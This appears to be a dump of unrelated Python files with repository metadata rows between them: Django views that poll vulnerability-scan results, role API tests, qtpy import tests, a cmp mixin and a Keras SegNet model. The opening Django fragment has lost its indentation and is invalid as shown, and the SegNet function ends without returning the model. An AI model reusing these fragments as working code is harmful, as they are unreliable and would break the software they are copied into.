return_response=obj.UpdateStatusExploit('',True)
return_response=obj.UpdateStatusInit()
else:
return_response["status"]="failure"
return_response["errors"]=update_data.errors
return_response["value"]=update_data.errors
return Response(JSONRenderer().render(return_response))
except Exception as ee:
return_response["status"]="failure"
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class PollingExploit(APIView):
"""
Objective :
This class polls the vulnerability scanning and returns its results.
For details of the input expected by this method and the response returned, read the API documentation.
"""
def get(self,request,format=None):
try:
self.project_obj=IPtable.Projects()
return_response={}
project_id=request.data["project_id"]
#Note the project need not be having status as complete
#as we might need this for concurrent mode also where the status
#of the master project might not be complete
#result=self.project_obj.completed_projects(int(project_id))
#if result[0] > 0:
if 1:
obj=Polling.PollingExploits(int(project_id))
continue_=False
delete=False
default_config=obj.ExploitPoll()
if default_config["status"]=="success":
exp_obj=Reconfigure()
resp=exp_obj.configure_response(default_config)
config_dict=resp[0]
config_list=resp[1]
record_list=resp[2]
return_response["status"]="success"
return_response["data"]=config_list
return_response["record_list"]=record_list
return Response(JSONRenderer().render(return_response))
else:
return Response(JSONRenderer().render(default_config))
else:
return_response["status"]="failure"
return_response["data"]="Invalid project id"
return_response["value"]="Invalid project id"
return Response(JSONRenderer().render(return_response))
except Exception as ee:
return_response={}
return_response["status"]="failure"
return_response["data"]=str(ee)
return Response(JSONRenderer().render(return_response))
def post(self,request,format=None):
try:
return_response={}
update_data=Polling_(data=request.data)
if(update_data.is_valid()):
project_id=update_data.data["project_id"]
record_list=update_data.data["record_list"]
obj=Polling.PollingExploits(int(project_id))
return_response=obj.UpdateStatusExploit(record_list)
else:
return_response["status"]="failure"
return_response["errors"]=update_data.errors
return_response["value"]=update_data.errors
return Response(JSONRenderer().render(return_response))
except Exception as ee:
return_response["status"]="failure"
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class ExploitConfigConc(APIView):
"""
Objective :
This class serves the GET method, which is used to fetch the results of
vulnerability scanning when the mode is concurrent.
It differs from polling: polling gives the config for records that discovery has just
finished, whereas this gives the chosen/updated config for all the records.
For details of the input expected by this method and the response returned, read the API documentation.
"""
def get(self,request,format=None):
try:
return_response={}
obj=Gui_main_driver.Gui_main()
project_id=request.data["project_id"]
continue_=False
delete=False
default_config=obj.getDefaultConfiguration(project_id,'','',True,True,'')
if default_config["status"]=="reconfig":
exp_obj=Reconfigure()
resp=exp_obj.configure_response(default_config)
config_dict=resp[0]
config_list=resp[1]
record_list=resp[2]
return_response["status"]="success"
return_response["data"]=config_list
return_response["record_list"]=record_list
return Response(JSONRenderer().render(return_response))
else:
return Response(JSONRenderer().render(default_config))
except Exception as ee:
return_response["status"]="failure"
return_response["data"]=str(ee)
return Response(JSONRenderer().render(return_response))
| 36.383687 | 284 | 0.718081 | 9,675 | 75,387 | 5.396279 | 0.055194 | 0.166523 | 0.049034 | 0.070486 | 0.831562 | 0.811642 | 0.793426 | 0.774637 | 0.748875 | 0.736616 | 0 | 0.012905 | 0.153037 | 75,387 | 2,071 | 285 | 36.401255 | 0.804777 | 0.108759 | 0 | 0.761555 | 0 | 0 | 0.138824 | 0.002071 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.004402 | 0.020543 | null | null | 0.016875 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
b6d5f5c48e6498417a94cf29e788054e5ef2caf0 | 527 | py | Python | devoutils/sorter/cmp_compatible.py | aarteagamel/python-utils | 7f310874750acd0171f2968cb45347da6cf78b72 | [
"MIT"
] | 4 | 2019-02-20T16:59:39.000Z | 2020-04-08T02:04:58.000Z | devoutils/sorter/cmp_compatible.py | aarteagamel/python-utils | 7f310874750acd0171f2968cb45347da6cf78b72 | [
"MIT"
] | 29 | 2019-02-22T16:19:25.000Z | 2022-03-31T13:02:14.000Z | devoutils/sorter/cmp_compatible.py | aarteagamel/python-utils | 7f310874750acd0171f2968cb45347da6cf78b72 | [
"MIT"
] | 2 | 2019-02-22T14:32:28.000Z | 2020-03-19T15:46:06.000Z | def cmp(a, b):
return (a > b) - (a < b)
# mixin class for Python3 supporting __cmp__
class PY3__cmp__:
def __eq__(self, other):
return self.__cmp__(other) == 0
def __ne__(self, other):
return self.__cmp__(other) != 0
def __gt__(self, other):
return self.__cmp__(other) > 0
def __lt__(self, other):
return self.__cmp__(other) < 0
def __ge__(self, other):
return self.__cmp__(other) >= 0
def __le__(self, other):
return self.__cmp__(other) <= 0
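To use the PY3__cmp__ mixin above, a class keeps a single __cmp__ method and inherits the rich comparisons from the mixin. `Version` below is a hypothetical example class, not something from this repo (the cmp helper and mixin are repeated so the sketch is self-contained):

```python
def cmp(a, b):
    return (a > b) - (a < b)

class PY3__cmp__:
    def __eq__(self, other):
        return self.__cmp__(other) == 0
    def __ne__(self, other):
        return self.__cmp__(other) != 0
    def __gt__(self, other):
        return self.__cmp__(other) > 0
    def __lt__(self, other):
        return self.__cmp__(other) < 0
    def __ge__(self, other):
        return self.__cmp__(other) >= 0
    def __le__(self, other):
        return self.__cmp__(other) <= 0

class Version(PY3__cmp__):
    # Orders versions by their numeric tuple via a single __cmp__.
    def __init__(self, parts):
        self.parts = tuple(parts)
    def __cmp__(self, other):
        return cmp(self.parts, other.parts)
```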
| 21.08 | 44 | 0.59962 | 72 | 527 | 3.611111 | 0.277778 | 0.207692 | 0.346154 | 0.438462 | 0.703846 | 0.703846 | 0.703846 | 0.596154 | 0 | 0 | 0 | 0.020997 | 0.27704 | 527 | 24 | 45 | 21.958333 | 0.661417 | 0.079696 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.466667 | false | 0 | 0 | 0.466667 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
b6e343d2e1a30fcbe2655f82ddf0c5d80bdfb9ce | 201 | py | Python | exapi/response_handlers/binance/spot/trading/__init__.py | astsu-dev/exapi | 1ef39ccdd77e9ddb60ec6eaa16a2cc26e1ac3e12 | [
"MIT"
] | null | null | null | exapi/response_handlers/binance/spot/trading/__init__.py | astsu-dev/exapi | 1ef39ccdd77e9ddb60ec6eaa16a2cc26e1ac3e12 | [
"MIT"
] | null | null | null | exapi/response_handlers/binance/spot/trading/__init__.py | astsu-dev/exapi | 1ef39ccdd77e9ddb60ec6eaa16a2cc26e1ac3e12 | [
"MIT"
] | null | null | null | from exapi.response_handlers.binance.spot.trading.handler import BinanceSpotTradingResponseHandler
from exapi.response_handlers.binance.spot.trading.interface import IBinanceSpotTradingResponseHandler
| 67 | 101 | 0.910448 | 20 | 201 | 9.05 | 0.6 | 0.099448 | 0.187845 | 0.276243 | 0.475138 | 0.475138 | 0.475138 | 0 | 0 | 0 | 0 | 0 | 0.039801 | 201 | 2 | 102 | 100.5 | 0.937824 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
b6ed2af1d1ab85e42f629f00ae2ccf7357f69702 | 9,391 | py | Python | tests/test_roles.py | PiWatcher/pci-backend | 094e366c47ca2ca17f5d7d54e0d15251d4f6494a | [
"MIT"
] | null | null | null | tests/test_roles.py | PiWatcher/pci-backend | 094e366c47ca2ca17f5d7d54e0d15251d4f6494a | [
"MIT"
] | 35 | 2021-03-09T00:10:44.000Z | 2021-04-28T22:39:22.000Z | tests/test_roles.py | PiWatcher/pci-backend | 094e366c47ca2ca17f5d7d54e0d15251d4f6494a | [
"MIT"
] | null | null | null | import json

from tests.TestingSuite import BaseTestingSuite


class TestRolesResource(BaseTestingSuite):
    def setUp(self):
        print("Testing Roles resources...")
        super().setUp()
        self.user_payload = json.dumps({
            "email": "iotadmin@nau.edu",
            "password": "password"
        })

    def test_successful_collect_roles(self):
        user_token = self.app.post(
            '/api/auth/signin',
            headers={'Content-Type': 'application/json'},
            data=self.user_payload).json["jwt_token"]
        response = self.app.get(
            '/api/auth/roles',
            headers={'Content-Type': 'application/json',
                     'Authorization': f'Bearer {user_token}'})
        self.assertEqual({
            'can_view_raw': True,
            'is_admin': True,
            'role_name': 'admin'
        }, response.json['roles'][0])
        self.assertEqual(200, response.status_code)

    def test_bad_permissions_collect_roles(self):
        test_user_payload = json.dumps({
            "email": "testuser@test.com",
            "password": 'testpassword',
            'full_name': 'test_user'
        })
        self.app.post(
            '/api/auth/signup',
            headers={'Content-Type': 'application/json'},
            data=test_user_payload)
        user_token = self.app.post(
            '/api/auth/signin',
            headers={'Content-Type': 'application/json'},
            data=json.dumps({
                "email": "testuser@test.com",
                "password": "testpassword",
            })).json['jwt_token']
        response = self.app.get(
            '/api/auth/roles',
            headers={'Content-Type': 'application/json',
                     'Authorization': f'Bearer {user_token}'})
        self.assertEqual('Invalid token.', response.json['message'])
        self.assertEqual(403, response.status_code)

    def test_successful_create_role(self):
        user_token = self.app.post(
            '/api/auth/signin',
            headers={'Content-Type': 'application/json'},
            data=json.dumps({
                "email": "iotadmin@nau.edu",
                "password": "password"
            })).json['jwt_token']
        response = self.app.post(
            '/api/auth/roles',
            headers={'Content-Type': 'application/json',
                     'Authorization': f'Bearer {user_token}'},
            data=json.dumps({'role_name': 'test_role'}))
        self.assertEqual({
            'role_name': 'test_role',
            'is_admin': False,
            'can_view_raw': False
        }, response.json['new_role'])
        self.assertEqual(200, response.status_code)

    def test_bad_permissions_create_role(self):
        test_user_payload = json.dumps({
            "email": "testuser@test.com",
            "password": 'testpassword',
            'full_name': 'test_user'
        })
        self.app.post(
            '/api/auth/signup',
            headers={'Content-Type': 'application/json'},
            data=test_user_payload)
        user_token = self.app.post(
            '/api/auth/signin',
            headers={'Content-Type': 'application/json'},
            data=json.dumps({
                "email": "testuser@test.com",
                "password": "testpassword",
            })).json['jwt_token']
        response = self.app.get(
            '/api/auth/roles',
            headers={'Content-Type': 'application/json',
                     'Authorization': f'Bearer {user_token}'},
            data=json.dumps({'role_name': 'test_role'}))
        self.assertEqual('Invalid token.', response.json['message'])
        self.assertEqual(403, response.status_code)

    def test_successful_delete_role(self):
        admin_token = self.app.post(
            '/api/auth/signin',
            headers={'Content-Type': 'application/json'},
            data=self.user_payload).json['jwt_token']
        response = self.app.delete(
            '/api/auth/roles',
            headers={'Content-Type': 'application/json',
                     'Authorization': f'Bearer {admin_token}'},
            data=json.dumps({'role_name': 'public'}))
        self.assertEqual('Successfully deleted public from roles.', response.json['message'])
        self.assertEqual(200, response.status_code)

    def test_bad_permissions_delete_role(self):
        test_user_payload = json.dumps({
            "email": "testuser@test.com",
            "password": 'testpassword',
            'full_name': 'test_user'
        })
        self.app.post(
            '/api/auth/signup',
            headers={'Content-Type': 'application/json'},
            data=test_user_payload)
        user_token = self.app.post(
            '/api/auth/signin',
            headers={'Content-Type': 'application/json'},
            data=json.dumps({
                "email": "testuser@test.com",
                "password": "testpassword",
            })).json['jwt_token']
        response = self.app.delete(
            '/api/auth/roles',
            headers={'Content-Type': 'application/json',
                     'Authorization': f'Bearer {user_token}'},
            data=json.dumps({'role_name': 'public'}))
        self.assertEqual('Invalid token.', response.json['message'])
        self.assertEqual(403, response.status_code)

    def test_schema_error_delete_role(self):
        user_token = self.app.post(
            '/api/auth/signin',
            headers={'Content-Type': 'application/json'},
            data=self.user_payload).json['jwt_token']
        response = self.app.delete(
            '/api/auth/roles',
            headers={'Content-Type': 'application/json',
                     'Authorization': f'Bearer {user_token}'},
            data=json.dumps({'not_a_valid_key': 'randomdata'}))
        self.assertEqual('Request is missing required fields.', response.json['message'])
        self.assertEqual(400, response.status_code)

    def test_role_dne_error_delete_role(self):
        user_token = self.app.post(
            '/api/auth/signin',
            headers={'Content-Type': 'application/json'},
            data=self.user_payload).json['jwt_token']
        response = self.app.delete(
            '/api/auth/roles',
            headers={'Content-Type': 'application/json',
                     'Authorization': f'Bearer {user_token}'},
            data=json.dumps({'role_name': 'a_role_that_does_not_exist'}))
        self.assertEqual('That role does not exist.', response.json['message'])
        self.assertEqual(400, response.status_code)
| 43.276498 | 93 | 0.388776 | 667 | 9,391 | 5.308846 | 0.136432 | 0.03756 | 0.096583 | 0.155606 | 0.854561 | 0.842982 | 0.835357 | 0.835357 | 0.814459 | 0.768427 | 0 | 0.005407 | 0.507614 | 9,391 | 216 | 94 | 43.476852 | 0.760381 | 0 | 0 | 0.730769 | 0 | 0 | 0.208413 | 0.002769 | 0 | 0 | 0 | 0 | 0.087912 | 1 | 0.049451 | false | 0.043956 | 0.010989 | 0 | 0.065934 | 0.005495 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
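Every authenticated request in the test file above follows one pattern: sign in, read `jwt_token` from the JSON response, and send it back in an `Authorization: Bearer` header. A minimal sketch of the header construction (the helper name is ours, not the project's):

```python
def bearer_headers(token):
    # Headers used by the authenticated requests in the tests above.
    return {
        'Content-Type': 'application/json',
        'Authorization': f'Bearer {token}',
    }


headers = bearer_headers('abc123')
assert headers['Authorization'] == 'Bearer abc123'
```

Factoring this out would also shorten the tests themselves, which currently rebuild the same dict in every method.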
8e287da622f071339141aa812b8e04cc9cc643c8 | 4,935 | py | Python | GPS_vis_env/Lib/site-packages/qtpy/tests/test_qtdatavisualization.py | morekeng/GPS-visualization-Python | c07fd3128e94b10699bf12b0418ec8ef476755da | [
"MIT"
] | 1 | 2022-01-28T00:03:19.000Z | 2022-01-28T00:03:19.000Z | GPS_vis_env/Lib/site-packages/qtpy/tests/test_qtdatavisualization.py | morekeng/GPS-visualization-Python | c07fd3128e94b10699bf12b0418ec8ef476755da | [
"MIT"
] | null | null | null | GPS_vis_env/Lib/site-packages/qtpy/tests/test_qtdatavisualization.py | morekeng/GPS-visualization-Python | c07fd3128e94b10699bf12b0418ec8ef476755da | [
"MIT"
] | 1 | 2021-11-23T00:49:26.000Z | 2021-11-23T00:49:26.000Z | from __future__ import absolute_import

import sys

import pytest

import qtpy
from qtpy import PYQT5, PYSIDE2
from qtpy.py3compat import PY3


@pytest.mark.skipif(
    sys.platform != "win32" or not (PYQT5 or PYSIDE2) or PY3,
    reason="Only available in Qt5 bindings and Python 2 on Windows")
def test_qtdatavisualization():
    """Test the qtpy.QtDataVisualization namespace"""
    # QtDataVisualization
    assert qtpy.QtDataVisualization.QScatter3DSeries is not None
    assert qtpy.QtDataVisualization.QSurfaceDataItem is not None
    assert qtpy.QtDataVisualization.QSurface3DSeries is not None
    assert qtpy.QtDataVisualization.QAbstract3DInputHandler is not None
    assert qtpy.QtDataVisualization.QHeightMapSurfaceDataProxy is not None
    assert qtpy.QtDataVisualization.QAbstractDataProxy is not None
    assert qtpy.QtDataVisualization.Q3DCamera is not None
    assert qtpy.QtDataVisualization.QAbstract3DGraph is not None
    assert qtpy.QtDataVisualization.QCustom3DVolume is not None
    assert qtpy.QtDataVisualization.Q3DInputHandler is not None
    assert qtpy.QtDataVisualization.QBarDataProxy is not None
    assert qtpy.QtDataVisualization.QSurfaceDataProxy is not None
    assert qtpy.QtDataVisualization.QScatterDataItem is not None
    assert qtpy.QtDataVisualization.Q3DLight is not None
    assert qtpy.QtDataVisualization.QScatterDataProxy is not None
    assert qtpy.QtDataVisualization.QValue3DAxis is not None
    assert qtpy.QtDataVisualization.Q3DBars is not None
    assert qtpy.QtDataVisualization.QBarDataItem is not None
    assert qtpy.QtDataVisualization.QItemModelBarDataProxy is not None
    assert qtpy.QtDataVisualization.Q3DTheme is not None
    assert qtpy.QtDataVisualization.QCustom3DItem is not None
    assert qtpy.QtDataVisualization.QItemModelScatterDataProxy is not None
    assert qtpy.QtDataVisualization.QValue3DAxisFormatter is not None
    assert qtpy.QtDataVisualization.QItemModelSurfaceDataProxy is not None
    assert qtpy.QtDataVisualization.Q3DScatter is not None
    assert qtpy.QtDataVisualization.QTouch3DInputHandler is not None
    assert qtpy.QtDataVisualization.QBar3DSeries is not None
    assert qtpy.QtDataVisualization.QAbstract3DAxis is not None
    assert qtpy.QtDataVisualization.Q3DScene is not None
    assert qtpy.QtDataVisualization.QCategory3DAxis is not None
    assert qtpy.QtDataVisualization.QAbstract3DSeries is not None
    assert qtpy.QtDataVisualization.Q3DObject is not None
    assert qtpy.QtDataVisualization.QCustom3DLabel is not None
    assert qtpy.QtDataVisualization.Q3DSurface is not None
    assert qtpy.QtDataVisualization.QLogValue3DAxisFormatter is not None
    # QtDatavisualization
    assert qtpy.QtDatavisualization.QScatter3DSeries is not None
    assert qtpy.QtDatavisualization.QSurfaceDataItem is not None
    assert qtpy.QtDatavisualization.QSurface3DSeries is not None
    assert qtpy.QtDatavisualization.QAbstract3DInputHandler is not None
    assert qtpy.QtDatavisualization.QHeightMapSurfaceDataProxy is not None
    assert qtpy.QtDatavisualization.QAbstractDataProxy is not None
    assert qtpy.QtDatavisualization.Q3DCamera is not None
    assert qtpy.QtDatavisualization.QAbstract3DGraph is not None
    assert qtpy.QtDatavisualization.QCustom3DVolume is not None
    assert qtpy.QtDatavisualization.Q3DInputHandler is not None
    assert qtpy.QtDatavisualization.QBarDataProxy is not None
    assert qtpy.QtDatavisualization.QSurfaceDataProxy is not None
    assert qtpy.QtDatavisualization.QScatterDataItem is not None
    assert qtpy.QtDatavisualization.Q3DLight is not None
    assert qtpy.QtDatavisualization.QScatterDataProxy is not None
    assert qtpy.QtDatavisualization.QValue3DAxis is not None
    assert qtpy.QtDatavisualization.Q3DBars is not None
    assert qtpy.QtDatavisualization.QBarDataItem is not None
    assert qtpy.QtDatavisualization.QItemModelBarDataProxy is not None
    assert qtpy.QtDatavisualization.Q3DTheme is not None
    assert qtpy.QtDatavisualization.QCustom3DItem is not None
    assert qtpy.QtDatavisualization.QItemModelScatterDataProxy is not None
    assert qtpy.QtDatavisualization.QValue3DAxisFormatter is not None
    assert qtpy.QtDatavisualization.QItemModelSurfaceDataProxy is not None
    assert qtpy.QtDatavisualization.Q3DScatter is not None
    assert qtpy.QtDatavisualization.QTouch3DInputHandler is not None
    assert qtpy.QtDatavisualization.QBar3DSeries is not None
    assert qtpy.QtDatavisualization.QAbstract3DAxis is not None
    assert qtpy.QtDatavisualization.Q3DScene is not None
    assert qtpy.QtDatavisualization.QCategory3DAxis is not None
    assert qtpy.QtDatavisualization.QAbstract3DSeries is not None
    assert qtpy.QtDatavisualization.Q3DObject is not None
    assert qtpy.QtDatavisualization.QCustom3DLabel is not None
    assert qtpy.QtDatavisualization.Q3DSurface is not None
    assert qtpy.QtDatavisualization.QLogValue3DAxisFormatter is not None
| 56.724138 | 74 | 0.823303 | 543 | 4,935 | 7.471455 | 0.130755 | 0.402514 | 0.50037 | 0.251417 | 0.932216 | 0.932216 | 0.932216 | 0.932216 | 0.932216 | 0.932216 | 0 | 0.013938 | 0.142249 | 4,935 | 86 | 75 | 57.383721 | 0.944484 | 0.017021 | 0 | 0 | 0 | 0 | 0.01218 | 0 | 0 | 0 | 0 | 0 | 0.886076 | 1 | 0.012658 | true | 0 | 0.063291 | 0 | 0.075949 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
8e331b435d0f6fe2af86c540cd8c467c76b5219a | 87 | py | Python | tests/import_test.py | whitphx/streamlit-timing | 7578c6a40a7ed3623a1abf453b8d8b8b1a92666b | [
"MIT"
] | null | null | null | tests/import_test.py | whitphx/streamlit-timing | 7578c6a40a7ed3623a1abf453b8d8b8b1a92666b | [
"MIT"
] | null | null | null | tests/import_test.py | whitphx/streamlit-timing | 7578c6a40a7ed3623a1abf453b8d8b8b1a92666b | [
"MIT"
] | null | null | null | def test_streamlit_timing_can_be_imported():
    import streamlit_timing  # noqa: F401
| 29 | 44 | 0.804598 | 12 | 87 | 5.333333 | 0.833333 | 0.46875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04 | 0.137931 | 87 | 2 | 45 | 43.5 | 0.813333 | 0.114943 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 1 | 0 | 1.5 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
f3dfce8c5e9417208b90785c7539925a120e1abf | 228 | py | Python | tests/python/pypackagecomplex/complex/subpackage/__init__.py | mgaitan/sphinx-autoapi | 0b947a028e10b580936f8e3c32ddc2468479e72d | [
"MIT"
] | 197 | 2019-06-29T07:59:40.000Z | 2022-03-13T14:10:54.000Z | tests/python/pypackagecomplex/complex/subpackage/__init__.py | mgaitan/sphinx-autoapi | 0b947a028e10b580936f8e3c32ddc2468479e72d | [
"MIT"
] | 158 | 2019-07-04T09:47:12.000Z | 2022-03-30T06:12:34.000Z | tests/python/pypackagecomplex/complex/subpackage/__init__.py | mgaitan/sphinx-autoapi | 0b947a028e10b580936f8e3c32ddc2468479e72d | [
"MIT"
] | 91 | 2019-07-02T17:52:32.000Z | 2022-03-29T12:34:11.000Z | from .submodule import public_chain
from .submodule import _private_made_public as now_public_function
from .submodule import public_multiple_imports
def module_level_method(foo, bar):
    """A module level method"""
    pass
| 25.333333 | 66 | 0.802632 | 32 | 228 | 5.40625 | 0.625 | 0.225434 | 0.32948 | 0.289017 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140351 | 228 | 8 | 67 | 28.5 | 0.882653 | 0.092105 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0.2 | 0.6 | 0 | 0.8 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
f3e5d251175c963ac91057e7e32cbda7b0f8e383 | 162 | py | Python | avara/admin.py | avara1986/avara | 6fc4dac08f7b00fcd53c885b2426a1b5be20a1c9 | [
"Apache-2.0"
] | 2 | 2015-08-11T12:27:48.000Z | 2016-04-17T10:51:53.000Z | avara/admin.py | avara1986/avara | 6fc4dac08f7b00fcd53c885b2426a1b5be20a1c9 | [
"Apache-2.0"
] | null | null | null | avara/admin.py | avara1986/avara | 6fc4dac08f7b00fcd53c885b2426a1b5be20a1c9 | [
"Apache-2.0"
] | null | null | null | from django.contrib import admin
from django.contrib.auth.models import User
from django.contrib.auth.admin import UserAdmin
admin.site.register(User, UserAdmin) | 32.4 | 47 | 0.839506 | 24 | 162 | 5.666667 | 0.458333 | 0.220588 | 0.375 | 0.308824 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08642 | 162 | 5 | 48 | 32.4 | 0.918919 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.75 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
f3f19395628fbcc28476078f72f4267db7b93d54 | 4,744 | py | Python | 常用分割模型/SegNet.py | 1044197988/TF.Keras-Commonly-used-models | b37276bcee454b2c39b8fcc60e87b72ec8a6a5d4 | [
"Apache-2.0"
] | 160 | 2019-09-19T14:13:23.000Z | 2022-03-25T03:14:20.000Z | 常用分割模型/SegNet.py | johonnyyang/TF.Keras-Commonly-used-models | b37276bcee454b2c39b8fcc60e87b72ec8a6a5d4 | [
"Apache-2.0"
] | 1 | 2020-11-11T08:37:02.000Z | 2020-11-11T08:37:58.000Z | 常用分割模型/SegNet.py | johonnyyang/TF.Keras-Commonly-used-models | b37276bcee454b2c39b8fcc60e87b72ec8a6a5d4 | [
"Apache-2.0"
] | 70 | 2019-09-24T03:05:09.000Z | 2022-03-25T03:14:21.000Z | from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Conv2D,MaxPooling2D,UpSampling2D,BatchNormalization,Reshape,Permute,Activation
# Set the image size
img_w = 512
img_h = 512
# Number of classes
n_label = 6


def SegNet():
    model = Sequential()
    # encoder
    model.add(Conv2D(64, (3, 3), strides=(1, 1), input_shape=(img_w, img_h, 3), padding='same', activation='relu', data_format='channels_last'))
    model.add(BatchNormalization())
    model.add(Conv2D(64, (3, 3), strides=(1, 1), padding='same', activation='relu'))
    model.add(BatchNormalization())
    model.add(MaxPooling2D(pool_size=(2, 2)))
    # (128,128)
    model.add(Conv2D(128, (3, 3), strides=(1, 1), padding='same', activation='relu'))
    model.add(BatchNormalization())
    model.add(Conv2D(128, (3, 3), strides=(1, 1), padding='same', activation='relu'))
    model.add(BatchNormalization())
    model.add(MaxPooling2D(pool_size=(2, 2)))
    # (64,64)
    model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
    model.add(BatchNormalization())
    model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
    model.add(BatchNormalization())
    model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
    model.add(BatchNormalization())
    model.add(MaxPooling2D(pool_size=(2, 2)))
    # (32,32)
    model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
    model.add(BatchNormalization())
    model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
    model.add(BatchNormalization())
    model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
    model.add(BatchNormalization())
    model.add(MaxPooling2D(pool_size=(2, 2)))
    # (16,16)
    model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
    model.add(BatchNormalization())
    model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
    model.add(BatchNormalization())
    model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
    model.add(BatchNormalization())
    model.add(MaxPooling2D(pool_size=(2, 2)))
    # (8,8)
    # decoder
    model.add(UpSampling2D(size=(2, 2)))
    # (16,16)
    model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
    model.add(BatchNormalization())
    model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
    model.add(BatchNormalization())
    model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
    model.add(BatchNormalization())
    model.add(UpSampling2D(size=(2, 2)))
    # (32,32)
    model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
    model.add(BatchNormalization())
    model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
    model.add(BatchNormalization())
    model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
    model.add(BatchNormalization())
    model.add(UpSampling2D(size=(2, 2)))
    # (64,64)
    model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
    model.add(BatchNormalization())
    model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
    model.add(BatchNormalization())
    model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
    model.add(BatchNormalization())
    model.add(UpSampling2D(size=(2, 2)))
    # (128,128)
    model.add(Conv2D(128, (3, 3), strides=(1, 1), padding='same', activation='relu'))
    model.add(BatchNormalization())
    model.add(Conv2D(128, (3, 3), strides=(1, 1), padding='same', activation='relu'))
    model.add(BatchNormalization())
    model.add(UpSampling2D(size=(2, 2)))
    # (256,256)
    model.add(Conv2D(64, (3, 3), strides=(1, 1), input_shape=(img_w, img_h, 3), padding='same', activation='relu', data_format='channels_last'))
    model.add(BatchNormalization())
    model.add(Conv2D(64, (3, 3), strides=(1, 1), padding='same', activation='relu'))
    model.add(BatchNormalization())
    model.add(Conv2D(n_label, (1, 1), strides=(1, 1), padding='same'))
    model.add(Reshape((img_w * img_h, n_label)))
    # Swap axis=1 and axis=2; equivalent to np.swapaxes(layer, 1, 2)
    # model.add(Permute((2, 1)))
    model.add(Activation('softmax'))
